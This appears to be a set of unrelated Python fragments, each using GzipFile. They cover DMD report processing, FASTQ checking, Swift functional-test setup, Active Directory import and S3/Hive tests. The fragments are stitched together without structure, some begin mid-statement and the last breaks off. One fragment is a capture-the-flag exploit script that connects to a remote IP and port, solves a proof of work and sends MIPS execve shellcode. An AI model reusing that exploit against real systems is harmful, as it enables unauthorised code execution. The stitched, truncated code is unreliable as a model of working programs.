def __enter__(self): self._buffer = StringIO() self._writer = GzipFile(mode="wb", fileobj=self._buffer) return self._writer
def process_dmd_files_impl(dmd_files, args): out_dir = os.path.dirname(dmd_files[0]) procrank = open(os.path.join(out_dir, 'b2g-procrank'), 'r').read().split('\n') proc_names = {} for line in procrank: # App names may contain spaces and special characters (e.g. # '(Preallocated app)'). But for our purposes here, it's easier to # look at only the first word, and to strip off any special characters. # # We also assume that if an app name contains numbers, it contains them # only in the first word. match = re.match(r'^(\S+)\s+\D*(\d+)', line) if not match: continue proc_names[int(match.group(2))] = re.sub('\W', '', match.group(1)).lower() for f in dmd_files: # Extract the PID (e.g. 111) and UNIX time (e.g. 9999999) from the name # of the dmd file (e.g. dmd-9999999-111.txt.gz). basename = os.path.basename(f) dmd_filename_match = re.match(r'^dmd-(\d+)-(\d+).', basename) if dmd_filename_match: creation_time = datetime.fromtimestamp(int(dmd_filename_match.group(1))) pid = int(dmd_filename_match.group(2)) if pid in proc_names: proc_name = proc_names[pid] outfile_name = 'dmd-%s-%d.txt.gz' % (proc_name, pid) else: proc_name = None outfile_name = 'dmd-%d.txt.gz' % pid else: pid = None creation_time = None outfile_name = 'processed-' + basename outfile = GzipFile(os.path.join(out_dir, outfile_name), 'w') def write(str): print(str, file=outfile) write('# Processed DMD output') if creation_time: write('# Created on %s, device time (may be unreliable).' % creation_time.strftime('%c')) write('# Processed on %s, host machine time.' % datetime.now().strftime('%c')) if proc_name: write('# Corresponds to "%s" app, pid %d' % (proc_name, pid)) elif pid: write('# Corresponds to unknown app, pid %d' % pid) else: write('# Corresponds to unknown app, unknown pid.') write('#\n# Contents of b2g-procrank:\n#') for line in procrank: write('# ' + line.strip()) write('\n') fix_b2g_stack.fix_b2g_stacks_in_file(GzipFile(f, 'r'), outfile, args) if not args.keep_individual_reports: os.remove(f)
def encode(self): encoded = super(CompressedAsset, self).encode() io = BytesIO() with GzipFile(fileobj=io, mode='wb') as gz: gz.write(encoded) return io.getvalue()
def is_fastq(fastq_file, verbose): n_lines_head = 10000 if not os.path.isfile(fastq_file): sys.stderr.write("[E::main] Error: " + fastq_file + ': No such file.\n') sys.exit(1) try: zippedInput = False if (fastq_file.endswith(".gz")): zippedInput = True with GzipFile(fastq_file) as filef: head = list(islice(filef, n_lines_head)) elif (fastq_file.endswith(".bz2")): zippedInput = True with BZ2File(fastq_file) as filef: head = list(islice(filef, n_lines_head)) else: try: with open(fastq_file) as filef: head = list(islice(filef, n_lines_head)) except: sys.stderr.write("[E::main] Error loading file: " + fastq_file + "\n") sys.exit(1) except: sys.stderr.write("[E::main] Error. Cannot load the file " + fastq_file + "\n") sys.stderr.write( "[E::main] Supported file are zipped .gz or .bz2, or plain text\n") sys.exit(1) # check min length of fastq file: if len(head) < 4: sys.stderr.write("[E::main] Error: file " + fastq_file + " is not a fastq file\n") sys.exit(1) # go through the lines in head all_lengths = list() cont_line = 1 cont = 0 for line in head: cont = cont + 1 if zippedInput: line = line.decode('ascii') if cont_line == 1: if line[0] != "@": print_error_fasta("Line does not start with @", cont, fastq_file) if cont_line == 2: l1 = len(line) if cont_line == 3: if line[0] != "+": print_error_fasta("Line does not start with +", cont, fastq_file) if cont_line == 4: l2 = len(line) if (l1 != l2): print_error_fasta( "Length of quality line is different from length of the read", cont, fastq_file) else: all_lengths.append(l1) if cont_line != 4: cont_line = cont_line + 1 else: cont_line = 1 if len(all_lengths) < 1: sys.stderr.write("[E::main] Error: file " + fastq_file + " is not a fastq file\n") sys.exit(1) if (all(x == all_lengths[0] for x in all_lengths)) and len(all_lengths) > 1: if verbose >= 2: sys.stderr.write( "[W::main] Warning: file " + fastq_file + ". The length of the first " + str(len(all_lengths)) + " reads is " + str(all_lengths[0]) + ". It is suggested to quality control the reads before profiling\n" ) avg_length = sum(all_lengths) / float(len(all_lengths)) return int(avg_length)
def in_process_setup(the_object_server=object_server): _info('IN-PROCESS SERVERS IN USE FOR FUNCTIONAL TESTS') _info('Using object_server class: %s' % the_object_server.__name__) conf_src_dir = os.environ.get('SWIFT_TEST_IN_PROCESS_CONF_DIR') show_debug_logs = os.environ.get('SWIFT_TEST_DEBUG_LOGS') if conf_src_dir is not None: if not os.path.isdir(conf_src_dir): msg = 'Config source %s is not a dir' % conf_src_dir raise InProcessException(msg) _info('Using config source dir: %s' % conf_src_dir) # If SWIFT_TEST_IN_PROCESS_CONF specifies a config source dir then # prefer config files from there, otherwise read config from source tree # sample files. A mixture of files from the two sources is allowed. proxy_conf = _in_process_find_conf_file(conf_src_dir, 'proxy-server.conf') _info('Using proxy config from %s' % proxy_conf) swift_conf_src = _in_process_find_conf_file(conf_src_dir, 'swift.conf') _info('Using swift config from %s' % swift_conf_src) monkey_patch_mimetools() global _testdir _testdir = os.path.join(mkdtemp(), 'tmp_functional') utils.mkdirs(_testdir) rmtree(_testdir) utils.mkdirs(os.path.join(_testdir, 'sda1')) utils.mkdirs(os.path.join(_testdir, 'sda1', 'tmp')) utils.mkdirs(os.path.join(_testdir, 'sdb1')) utils.mkdirs(os.path.join(_testdir, 'sdb1', 'tmp')) utils.mkdirs(os.path.join(_testdir, 'sdc1')) utils.mkdirs(os.path.join(_testdir, 'sdc1', 'tmp')) swift_conf = _in_process_setup_swift_conf(swift_conf_src, _testdir) _info('prepared swift.conf: %s' % swift_conf) # Call the associated method for the value of # 'SWIFT_TEST_IN_PROCESS_CONF_LOADER', if one exists conf_loader_label = os.environ.get('SWIFT_TEST_IN_PROCESS_CONF_LOADER') if conf_loader_label is not None: try: conf_loader = conf_loaders[conf_loader_label] _debug('Calling method %s mapped to conf loader %s' % (conf_loader.__name__, conf_loader_label)) except KeyError as missing_key: raise InProcessException('No function mapped for conf loader %s' % missing_key) try: # Pass-in proxy_conf, swift_conf files proxy_conf, swift_conf = conf_loader(proxy_conf, swift_conf) _debug('Now using proxy conf %s' % proxy_conf) _debug('Now using swift conf %s' % swift_conf) except Exception as err: # noqa raise InProcessException(err) obj_sockets = _in_process_setup_ring(swift_conf, conf_src_dir, _testdir) # load new swift.conf file if set_swift_dir(os.path.dirname(swift_conf)): constraints.reload_constraints() storage_policy.reload_storage_policies() global config config['__file__'] = 'in_process_setup()' if constraints.SWIFT_CONSTRAINTS_LOADED: # Use the swift constraints that are loaded for the test framework # configuration _c = dict( (k, str(v)) for k, v in constraints.EFFECTIVE_CONSTRAINTS.items()) config.update(_c) else: # In-process swift constraints were not loaded, somethings wrong raise SkipTest global _test_socks _test_socks = [] # We create the proxy server listening socket to get its port number so # that we can add it as the "auth_port" value for the functional test # clients. prolis = listen_zero() _test_socks.append(prolis) # The following set of configuration values is used both for the # functional test frame work and for the various proxy, account, container # and object servers. config.update({ # Values needed by the various in-process swift servers 'devices': _testdir, 'swift_dir': _testdir, 'mount_check': 'false', 'client_timeout': '4', 'allow_account_management': 'true', 'account_autocreate': 'true', 'allow_versions': 'True', 'allow_versioned_writes': 'True', # TODO: move this into s3api config loader because they are # required by only s3api 'allowed_headers': "Content-Disposition, Content-Encoding, X-Delete-At, " "X-Object-Manifest, X-Static-Large-Object, Cache-Control, " "Content-Language, Expires, X-Robots-Tag", # Below are values used by the functional test framework, as well as # by the various in-process swift servers 'auth_host': '127.0.0.1', 'auth_port': str(prolis.getsockname()[1]), 'auth_ssl': 'no', 'auth_prefix': '/auth/', # Primary functional test account (needs admin access to the # account) 'account': 'test', 'username': '******', 'password': '******', 's3_access_key': 'test:tester', 's3_secret_key': 'testing', # Secondary user of the primary test account (needs admin access # to the account) for s3api 's3_access_key2': 'test:tester2', 's3_secret_key2': 'testing2', # User on a second account (needs admin access to the account) 'account2': 'test2', 'username2': 'tester2', 'password2': 'testing2', # User on same account as first, but without admin access 'username3': 'tester3', 'password3': 'testing3', 's3_access_key3': 'test:tester3', 's3_secret_key3': 'testing3', # Service user and prefix (emulates glance, cinder, etc. user) 'account5': 'test5', 'username5': 'tester5', 'password5': 'testing5', 'service_prefix': 'SERVICE', # For tempauth middleware. Update reseller_prefix 'reseller_prefix': 'AUTH, SERVICE', 'SERVICE_require_group': 'service', # Reseller admin user (needs reseller_admin_role) 'account6': 'test6', 'username6': 'tester6', 'password6': 'testing6' }) acc1lis = listen_zero() acc2lis = listen_zero() con1lis = listen_zero() con2lis = listen_zero() _test_socks += [acc1lis, acc2lis, con1lis, con2lis] + obj_sockets account_ring_path = os.path.join(_testdir, 'account.ring.gz') with closing(GzipFile(account_ring_path, 'wb')) as f: pickle.dump( ring.RingData([[0, 1, 0, 1], [1, 0, 1, 0]], [{ 'id': 0, 'zone': 0, 'device': 'sda1', 'ip': '127.0.0.1', 'port': acc1lis.getsockname()[1] }, { 'id': 1, 'zone': 1, 'device': 'sdb1', 'ip': '127.0.0.1', 'port': acc2lis.getsockname()[1] }], 30), f) container_ring_path = os.path.join(_testdir, 'container.ring.gz') with closing(GzipFile(container_ring_path, 'wb')) as f: pickle.dump( ring.RingData([[0, 1, 0, 1], [1, 0, 1, 0]], [{ 'id': 0, 'zone': 0, 'device': 'sda1', 'ip': '127.0.0.1', 'port': con1lis.getsockname()[1] }, { 'id': 1, 'zone': 1, 'device': 'sdb1', 'ip': '127.0.0.1', 'port': con2lis.getsockname()[1] }], 30), f) # Default to only 4 seconds for in-process functional test runs eventlet.wsgi.WRITE_TIMEOUT = 4 def get_logger_name(name): if show_debug_logs: return debug_logger(name) else: return None acc1srv = account_server.AccountController(config, logger=get_logger_name('acct1')) acc2srv = account_server.AccountController(config, logger=get_logger_name('acct2')) con1srv = container_server.ContainerController( config, logger=get_logger_name('cont1')) con2srv = container_server.ContainerController( config, logger=get_logger_name('cont2')) objsrvs = [(obj_sockets[index], the_object_server.ObjectController(config, logger=get_logger_name( 'obj%d' % (index + 1)))) for index in range(len(obj_sockets))] if show_debug_logs: logger = get_logger_name('proxy') else: logger = utils.get_logger(config, 'wsgi-server', log_route='wsgi') def get_logger(name, *args, **kwargs): return logger with mock.patch('swift.common.utils.get_logger', get_logger): with mock.patch('swift.common.middleware.memcache.MemcacheMiddleware', FakeMemcacheMiddleware): try: app = loadapp(proxy_conf, global_conf=config) except Exception as e: raise InProcessException(e) nl = utils.NullLogger() global proxy_srv proxy_srv = prolis prospa = eventlet.spawn(eventlet.wsgi.server, prolis, app, nl, protocol=SwiftHttpProtocol) acc1spa = eventlet.spawn(eventlet.wsgi.server, acc1lis, acc1srv, nl, protocol=SwiftHttpProtocol) acc2spa = eventlet.spawn(eventlet.wsgi.server, acc2lis, acc2srv, nl, protocol=SwiftHttpProtocol) con1spa = eventlet.spawn(eventlet.wsgi.server, con1lis, con1srv, nl, protocol=SwiftHttpProtocol) con2spa = eventlet.spawn(eventlet.wsgi.server, con2lis, con2srv, nl, protocol=SwiftHttpProtocol) objspa = [ eventlet.spawn(eventlet.wsgi.server, objsrv[0], objsrv[1], nl, protocol=SwiftHttpProtocol) for objsrv in objsrvs ] global _test_coros _test_coros = \ (prospa, acc1spa, acc2spa, con1spa, con2spa) + tuple(objspa) # Create accounts "test" and "test2" def create_account(act): ts = utils.normalize_timestamp(time()) account_ring = Ring(_testdir, ring_name='account') partition, nodes = account_ring.get_nodes(act) for node in nodes: # Note: we are just using the http_connect method in the object # controller here to talk to the account server nodes. conn = swift.proxy.controllers.obj.http_connect( node['ip'], node['port'], node['device'], partition, 'PUT', '/' + act, { 'X-Timestamp': ts, 'x-trans-id': act }) resp = conn.getresponse() assert resp.status == 201, 'Unable to create account: %s\n%s' % ( resp.status, resp.body) create_account('AUTH_test') create_account('AUTH_test2')
# gzipout.py from gzip import GzipFile from StringIO import StringIO sio = StringIO() gzf = GzipFile(fileobj=sio, mode='wb') gzf.write(sys.stdin.read()) gzf.close() # Output gzipped stream. sys.stdout.write(sio.getvalue()) # It is performed as follows for trying operation on shell. # $ cat textfile | python gzipout.py | zcat # Moreover, since socket object used for network programming # cannot do seek(), it is once copied to StringIO. # gzipin.py from gzip import GzipFile from StringIO import StringIO gzstream = open('gzipped.gz', 'rb') sio = StringIO(gzstream) gz = GzipFile(fileobj=sio, mode='rb') print gz.read()
def unzip(infile, mode="rb", filename=None, **kwargs): if "r" not in mode: filename = filename or "file" z = ZipFile(infile, mode="w", **kwargs) fo = z.open(filename, mode="w") fo.close = lambda closer=fo.close: closer() or z.close() return fo z = ZipFile(infile) if filename is None: filename = z.namelist()[0] return z.open(filename, mode="r", **kwargs) register_compression("zip", unzip, "zip") register_compression("bz2", BZ2File, "bz2") register_compression("gzip", lambda f, **kwargs: GzipFile(fileobj=f, **kwargs), "gz") try: import lzma register_compression("lzma", lzma.LZMAFile, "xz") register_compression("xz", lzma.LZMAFile, "xz", force=True) except ImportError: pass try: import lzmaffi register_compression("lzma", lzmaffi.LZMAFile, "xz", force=True) register_compression("xz", lzmaffi.LZMAFile, "xz", force=True)
def load_gaf_entries(local=True): with open_gaf(local=local) as zf: with GzipFile(fileobj=zf) as f: f_without_comments = (line.decode('utf-8') for line in f if not line.startswith(b'!')) yield from csv.reader(f_without_comments, delimiter='\t')
def getDecompressedBase64Lic(lic): return GzipFile(fileobj=cStringIO.StringIO(b64decode(lic))).read()
def post(self): try: # Initialize report report = {'inserted': 0, 'updated': 0, 'total': 0, 'warnings': {}} objects_apply_policy = {'computer': [], 'user': []} db = self.request.db # Read GZIP data postedfile = self.request.POST['media'].file xmldata = GzipFile('', 'r', 9, StringIO(postedfile.read())).read() # Read XML data xmldoc = minidom.parseString(xmldata) # Get the root domain xmlDomain = xmldoc.getElementsByTagName('Domain')[0] is_ad_master = self.request.POST['master'] == 'True' domain = self._get_domain(self.importSchema[0], xmlDomain, is_ad_master, report) # Convert from AD objects to MongoDB objects mongoObjects = {} mongoObjectsPath = {} for objSchema in self.importSchema: objs = xmldoc.getElementsByTagName(objSchema['adName']) for adObj in objs: if not adObj.hasAttribute('ObjectGUID'): raise Exception( 'An Active Directory object must has "ObjectGUID" attrib.' ) mongoObject, is_saving = self._convertADObjectToMongoObject( domain, mongoObjects, objSchema, adObj, is_ad_master, report, objects_apply_policy) report['total'] += 1 if is_saving: mongoObjects[ mongoObject['adDistinguishedName']] = mongoObject mongoObjectsPath[ mongoObject['adDistinguishedName']] = mongoObject # Order mongoObjects by dependences if mongoObjects: mongoObjects[domain['adDistinguishedName']] = domain mongoObjectsPath[domain['adDistinguishedName']] = domain mongoObjects = self._orderByDependencesMongoObjects( mongoObjects, domain) # Save each MongoDB objects properRootDomainADDN = domain['adDistinguishedName'] for index, mongoObject in mongoObjects.items(): if index == properRootDomainADDN: continue # Get the proper path ("root,{0}._id,{1}._id,{2}._id...") listPath = re.findall(ur'([^, ]+=(?:(?:\\,)|[^,])+)', index) nodePath = ','.join(listPath[1:]) # Find parent mongoObjectParent = mongoObjectsPath[nodePath] mongoObjectParent = self.collection.find_one( {'_id': mongoObjectParent['_id']}) path = '{0},{1}'.format(mongoObjectParent['path'], str(mongoObjectParent['_id'])) mongoObject['path'] = path # Save mongoObject self._saveMongoObject(mongoObject) # AD Fixes admin_user = self.request.user chef_server_api = get_chef_api(get_current_registry().settings, admin_user) if is_ad_master: for index, mongoObject in mongoObjects.items(): if mongoObject['type'] == 'group': if mongoObject['members'] != []: mongoObject['members'] = [] self._saveMongoObject(mongoObject) for index, mongoObject in mongoObjects.items(): updateMongoObject = False # MemberOf if mongoObject['type'] in ('user', 'computer'): if 'memberof' not in mongoObject or is_ad_master: mongoObject['memberof'] = [] if 'adPrimaryGroup' in mongoObject and mongoObject[ 'adPrimaryGroup']: group = mongoObjects[mongoObject['adPrimaryGroup']] if is_visible_group(db, group['_id'], mongoObject): if not mongoObject['_id'] in group['members']: group['members'].append(mongoObject['_id']) self._saveMongoObject(group) if mongoObjects[mongoObject['adPrimaryGroup']][ '_id'] not in mongoObject['memberof']: mongoObject['memberof'].append(mongoObjects[ mongoObject['adPrimaryGroup']]['_id']) else: self._warningGroup(group, mongoObject, report) updateMongoObject = True del mongoObject['adPrimaryGroup'] if 'adMemberOf' in mongoObject and mongoObject[ 'adMemberOf']: for group_id in mongoObject['adMemberOf']: group = mongoObjects[group_id] if is_visible_group(db, group['_id'], mongoObject): if not mongoObject['_id'] in group['members']: group['members'].append(mongoObject['_id']) self._saveMongoObject(group) if mongoObjects[group_id][ '_id'] not in mongoObject['memberof']: mongoObject['memberof'].append( mongoObjects[group_id]['_id']) else: self._warningGroup(group, mongoObject, report) updateMongoObject = True del mongoObject['adMemberOf'] # Create Chef-Server Nodes if mongoObject['type'] == 'computer': chef_server_node = reserve_node_or_raise( mongoObject['name'], chef_server_api, 'gcc-ad-import-%s' % random.random(), attempts=3) ohai_gecos_in_runlist = self.RECIPE_NAME_OHAI_GECOS in chef_server_node.run_list gecos_ws_mgmt_in_runlist = self.RECIPE_NAME_GECOS_WS_MGMT in chef_server_node.run_list if not ohai_gecos_in_runlist and not gecos_ws_mgmt_in_runlist: chef_server_node.run_list.append( self.RECIPE_NAME_OHAI_GECOS) chef_server_node.run_list.append( self.RECIPE_NAME_GECOS_WS_MGMT) elif not ohai_gecos_in_runlist and gecos_ws_mgmt_in_runlist: chef_server_node.run_list.insert( chef_server_node.run_list.index( self.RECIPE_NAME_GECOS_WS_MGMT), self.RECIPE_NAME_OHAI_GECOS) elif ohai_gecos_in_runlist and not gecos_ws_mgmt_in_runlist: chef_server_node.run_list.insert( chef_server_node.run_list.index( self.RECIPE_NAME_OHAI_GECOS) + 1, self.RECIPE_NAME_GECOS_WS_MGMT) save_node_and_free(chef_server_node) chef_server_client = Client(mongoObject['name'], api=chef_server_api) if not chef_server_client.exists: chef_server_client.save() mongoObject['node_chef_id'] = mongoObject['name'] updateMongoObject = True # Save changes if updateMongoObject: self._saveMongoObject(mongoObject) # apply policies to new objects for node_type, node_names in objects_apply_policy.items(): nodes = self.collection.find({ 'name': { '$in': node_names }, 'path': get_filter_this_domain(domain), 'type': node_type }) for node in nodes: apply_policies_function = globals()['apply_policies_to_%s' % node['type']] apply_policies_function(self.collection, node, admin_user, api=chef_server_api) # Return result status = '{0} inserted, {1} updated of {2} objects imported successfully.'.format( report['inserted'], report['updated'], report['total']) response = {'status': status, 'ok': True} except Exception as e: logger.exception(e) response = {'status': u'{0}'.format(e), 'ok': False} warnings = report.get('warnings', []) if warnings: response['warnings'] = warnings return response
b *0x400d40 b *0x400c8c b *0x400b5c b *0x400b30 c ''') else: io = process(['./samples/0']) else: io = remote('106.53.114.216', 9999) assert solve_pow(io) assert io.recvline() == b'Binary Dump:\n' assert io.recvline() == b'===============\n' binary_dump_gz_b64 = io.recvline().decode() binary_dump_gz = base64.b64decode(binary_dump_gz_b64) binary_dump = GzipFile(fileobj=BytesIO(binary_dump_gz)).read() if args.LOCAL: solution = bytes.fromhex( 'da1ada1abb3dbb3d7def24b6f6fbb7b64b5d1669edf7edf787295cf25999ad717fe4e6c4bbf817b0c01f90c18ffd780a46480093c134fe043f7f3f7f87f361ad' ) else: solution = emu.solve(binary_dump, 'ctf') io.send(solution) io.recvuntil(b'Name\n') io.send(b'mslc') io.recvuntil(b'Your time comes.\n> ') # https://packetstormsecurity.com/files/105611/MIPS-execve-Shellcode.html io.send(b"\xff\xff\x06\x28" b"\xff\xff\xd0\x04" b"\xff\xff\x05\x28" b"\x01\x10\xe4\x27"
def setUp(self): self.file_names = {} self.task_id = 'S3ToHiveTransferTest' self.s3_key = 'S32hive_test_file' self.field_dict = OrderedDict([('Sno', 'BIGINT'), ('Some,Text', 'STRING')]) self.hive_table = 'S32hive_test_table' self.delimiter = '\t' self.create = True self.recreate = True self.partition = {'ds': 'STRING'} self.headers = True self.check_headers = True self.wildcard_match = False self.input_compressed = False self.kwargs = { 'task_id': self.task_id, 's3_key': self.s3_key, 'field_dict': self.field_dict, 'hive_table': self.hive_table, 'delimiter': self.delimiter, 'create': self.create, 'recreate': self.recreate, 'partition': self.partition, 'headers': self.headers, 'check_headers': self.check_headers, 'wildcard_match': self.wildcard_match, 'input_compressed': self.input_compressed } try: header = b"Sno\tSome,Text \n" line1 = b"1\tAirflow Test\n" line2 = b"2\tS32HiveTransfer\n" self.tmp_dir = mkdtemp(prefix='test_tmps32hive_') # create sample txt, gz and bz2 with and without headers with NamedTemporaryFile(mode='wb+', dir=self.tmp_dir, delete=False) as f_txt_h: self._set_fn(f_txt_h.name, '.txt', True) f_txt_h.writelines([header, line1, line2]) fn_gz = self._get_fn('.txt', True) + ".gz" with GzipFile(filename=fn_gz, mode="wb") as f_gz_h: self._set_fn(fn_gz, '.gz', True) f_gz_h.writelines([header, line1, line2]) fn_gz_upper = self._get_fn('.txt', True) + ".GZ" with GzipFile(filename=fn_gz_upper, mode="wb") as f_gz_upper_h: self._set_fn(fn_gz_upper, '.GZ', True) f_gz_upper_h.writelines([header, line1, line2]) fn_bz2 = self._get_fn('.txt', True) + '.bz2' with bz2.BZ2File(filename=fn_bz2, mode="wb") as f_bz2_h: self._set_fn(fn_bz2, '.bz2', True) f_bz2_h.writelines([header, line1, line2]) # create sample txt, bz and bz2 without header with NamedTemporaryFile(mode='wb+', dir=self.tmp_dir, delete=False) as f_txt_nh: self._set_fn(f_txt_nh.name, '.txt', False) f_txt_nh.writelines([line1, line2]) fn_gz = self._get_fn('.txt', False) + ".gz" with GzipFile(filename=fn_gz, mode="wb") as f_gz_nh: self._set_fn(fn_gz, '.gz', False) f_gz_nh.writelines([line1, line2]) fn_gz_upper = self._get_fn('.txt', False) + ".GZ" with GzipFile(filename=fn_gz_upper, mode="wb") as f_gz_upper_nh: self._set_fn(fn_gz_upper, '.GZ', False) f_gz_upper_nh.writelines([line1, line2]) fn_bz2 = self._get_fn('.txt', False) + '.bz2' with bz2.BZ2File(filename=fn_bz2, mode="wb") as f_bz2_nh: self._set_fn(fn_bz2, '.bz2', False) f_bz2_nh.writelines([line1, line2]) # Base Exception so it catches Keyboard Interrupt except BaseException as e: logging.error(e) self.tearDown()
def _zip_file(file_path): gz_file_path = file_path + '.gz' with open(file_path, 'rb') as f_in: with GzipFile(gz_file_path, 'wb') as f_out: shutil.copyfileobj(f_in, f_out) return gz_file_path
def S3CompressedReader(bucket, path): s3 = boto3.resource('s3') r = s3.Object(bucket, path).get() body = StringIO(r['Body'].read()) return GzipFile(mode="rb", fileobj=body)
def downallfiles3(id, psurobjid, filename, reportid): # url = "http://www.adrs.org.cn/ADR/cdrAttachment/attachmentDiskManager/" #id = "109913972074597010463482100000" #psurobjid = "243013972078880790070655100000" import random some = random.randrange(1000000000000000, 9999999999999999) boundary = '-----------------------------' + str(some) parts = [] parts.append('--' + boundary) parts.append('Content-Disposition: form-data; name="action"') parts.append('') parts.append(str("download")) parts.append('--' + boundary) parts.append('Content-Disposition: form-data; name="id"') parts.append('') parts.append(id) parts.append('--' + boundary + '--') parts.append('') body = '\r\n'.join(parts) header = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Encoding': 'gzip, deflate', 'Host': 'Host: www.adrs.org.cn', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'keep-alive', 'User-Agent': 'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0', 'Content-Type': 'multipart/form-data; boundary=%(boundary)s' % { "boundary": boundary }, 'Referer': 'http://www.adrs.org.cn/ADR/page/adrpage/psur/viewPsurReport.jsp?fdObjectId=%(objid)s&type=2' % { "objid": psurobjid } } try: common_url = urllib2.Request(url, headers=header) response = urllib2.urlopen(common_url, data=body, timeout=120) #print "response.info():",response.info() from cStringIO import StringIO from gzip import GzipFile data2 = GzipFile('', 'r', 0, StringIO(response.read())).read() response_data = data2 # 定义要创建的目录 import pathDlg mkpath = "c:\\mykill\\web\\" #mkpath = pathDlg.readini_path() path = mkdir(mkpath, psurobjid) name = path + "\\" + filename print name local_file = open(name, "wb") local_file.write(response_data) local_file.close() except (urllib2.HTTPError, urllib2.URLError, socket.error), exception: print u"下载出现错误,打印文件信息:", id, psurobjid, filename, reportid tempdata = (reportid, psurobjid, filename, id) insert_sql = ( "insert into pusr_dwfinfo_down_error(ReportID, FileID,ShowFileName BackUp1) " "value(%s,%s,%s,%s,%s)") mdrsql.mdr_insert_alone(insert_sql, tempdata) pass
def in_process_setup(the_object_server=object_server): _info('IN-PROCESS SERVERS IN USE FOR FUNCTIONAL TESTS') _info('Using object_server class: %s' % the_object_server.__name__) conf_src_dir = os.environ.get('SWIFT_TEST_IN_PROCESS_CONF_DIR') if conf_src_dir is not None: if not os.path.isdir(conf_src_dir): msg = 'Config source %s is not a dir' % conf_src_dir raise InProcessException(msg) _info('Using config source dir: %s' % conf_src_dir) # If SWIFT_TEST_IN_PROCESS_CONF specifies a config source dir then # prefer config files from there, otherwise read config from source tree # sample files. A mixture of files from the two sources is allowed. proxy_conf = _in_process_find_conf_file(conf_src_dir, 'proxy-server.conf') _info('Using proxy config from %s' % proxy_conf) swift_conf_src = _in_process_find_conf_file(conf_src_dir, 'swift.conf') _info('Using swift config from %s' % swift_conf_src) monkey_patch_mimetools() global _testdir _testdir = os.path.join(mkdtemp(), 'tmp_functional') utils.mkdirs(_testdir) rmtree(_testdir) utils.mkdirs(os.path.join(_testdir, 'sda1')) utils.mkdirs(os.path.join(_testdir, 'sda1', 'tmp')) utils.mkdirs(os.path.join(_testdir, 'sdb1')) utils.mkdirs(os.path.join(_testdir, 'sdb1', 'tmp')) swift_conf = _in_process_setup_swift_conf(swift_conf_src, _testdir) obj_sockets = _in_process_setup_ring(swift_conf, conf_src_dir, _testdir) global orig_swift_conf_name orig_swift_conf_name = utils.SWIFT_CONF_FILE utils.SWIFT_CONF_FILE = swift_conf constraints.reload_constraints() storage_policy.SWIFT_CONF_FILE = swift_conf storage_policy.reload_storage_policies() global config if constraints.SWIFT_CONSTRAINTS_LOADED: # Use the swift constraints that are loaded for the test framework # configuration _c = dict( (k, str(v)) for k, v in constraints.EFFECTIVE_CONSTRAINTS.items()) config.update(_c) else: # In-process swift constraints were not loaded, somethings wrong raise SkipTest global orig_hash_path_suff_pref orig_hash_path_suff_pref = utils.HASH_PATH_PREFIX, utils.HASH_PATH_SUFFIX utils.validate_hash_conf() # We create the proxy server listening socket to get its port number so # that we can add it as the "auth_port" value for the functional test # clients. prolis = eventlet.listen(('localhost', 0)) # The following set of configuration values is used both for the # functional test frame work and for the various proxy, account, container # and object servers. config.update({ # Values needed by the various in-process swift servers 'devices': _testdir, 'swift_dir': _testdir, 'mount_check': 'false', 'client_timeout': '4', 'allow_account_management': 'true', 'account_autocreate': 'true', 'allow_versions': 'True', # Below are values used by the functional test framework, as well as # by the various in-process swift servers 'auth_host': '127.0.0.1', 'auth_port': str(prolis.getsockname()[1]), 'auth_ssl': 'no', 'auth_prefix': '/auth/', # Primary functional test account (needs admin access to the # account) 'account': 'test', 'username': '******', 'password': '******', # User on a second account (needs admin access to the account) 'account2': 'test2', 'username2': 'tester2', 'password2': 'testing2', # User on same account as first, but without admin access 'username3': 'tester3', 'password3': 'testing3', # Service user and prefix (emulates glance, cinder, etc. user) 'account5': 'test5', 'username5': 'tester5', 'password5': 'testing5', 'service_prefix': 'SERVICE', # For tempauth middleware. Update reseller_prefix 'reseller_prefix': 'AUTH, SERVICE', 'SERVICE_require_group': 'service' }) acc1lis = eventlet.listen(('localhost', 0)) acc2lis = eventlet.listen(('localhost', 0)) con1lis = eventlet.listen(('localhost', 0)) con2lis = eventlet.listen(('localhost', 0)) account_ring_path = os.path.join(_testdir, 'account.ring.gz') with closing(GzipFile(account_ring_path, 'wb')) as f: pickle.dump( ring.RingData([[0, 1, 0, 1], [1, 0, 1, 0]], [{ 'id': 0, 'zone': 0, 'device': 'sda1', 'ip': '127.0.0.1', 'port': acc1lis.getsockname()[1] }, { 'id': 1, 'zone': 1, 'device': 'sdb1', 'ip': '127.0.0.1', 'port': acc2lis.getsockname()[1] }], 30), f) container_ring_path = os.path.join(_testdir, 'container.ring.gz') with closing(GzipFile(container_ring_path, 'wb')) as f: pickle.dump( ring.RingData([[0, 1, 0, 1], [1, 0, 1, 0]], [{ 'id': 0, 'zone': 0, 'device': 'sda1', 'ip': '127.0.0.1', 'port': con1lis.getsockname()[1] }, { 'id': 1, 'zone': 1, 'device': 'sdb1', 'ip': '127.0.0.1', 'port': con2lis.getsockname()[1] }], 30), f) eventlet.wsgi.HttpProtocol.default_request_version = "HTTP/1.0" # Turn off logging requests by the underlying WSGI software. eventlet.wsgi.HttpProtocol.log_request = lambda *a: None logger = utils.get_logger(config, 'wsgi-server', log_route='wsgi') # Redirect logging other messages by the underlying WSGI software. eventlet.wsgi.HttpProtocol.log_message = \ lambda s, f, *a: logger.error('ERROR WSGI: ' + f % a) # Default to only 4 seconds for in-process functional test runs eventlet.wsgi.WRITE_TIMEOUT = 4 acc1srv = account_server.AccountController(config, logger=debug_logger('acct1')) acc2srv = account_server.AccountController(config, logger=debug_logger('acct2')) con1srv = container_server.ContainerController( config, logger=debug_logger('cont1')) con2srv = container_server.ContainerController( config, logger=debug_logger('cont2')) objsrvs = [(obj_sockets[index], the_object_server.ObjectController(config, logger=debug_logger( 'obj%d' % (index + 1)))) for index in range(len(obj_sockets))] logger = debug_logger('proxy') def get_logger(name, *args, **kwargs): return logger with mock.patch('swift.common.utils.get_logger', get_logger): with mock.patch('swift.common.middleware.memcache.MemcacheMiddleware', FakeMemcacheMiddleware): try: app = loadapp(proxy_conf, global_conf=config) except Exception as e: raise InProcessException(e) nl = utils.NullLogger() prospa = eventlet.spawn(eventlet.wsgi.server, prolis, app, nl) acc1spa = eventlet.spawn(eventlet.wsgi.server, acc1lis, acc1srv, nl) acc2spa = eventlet.spawn(eventlet.wsgi.server, acc2lis, acc2srv, nl) con1spa = eventlet.spawn(eventlet.wsgi.server, con1lis, con1srv, nl) con2spa = 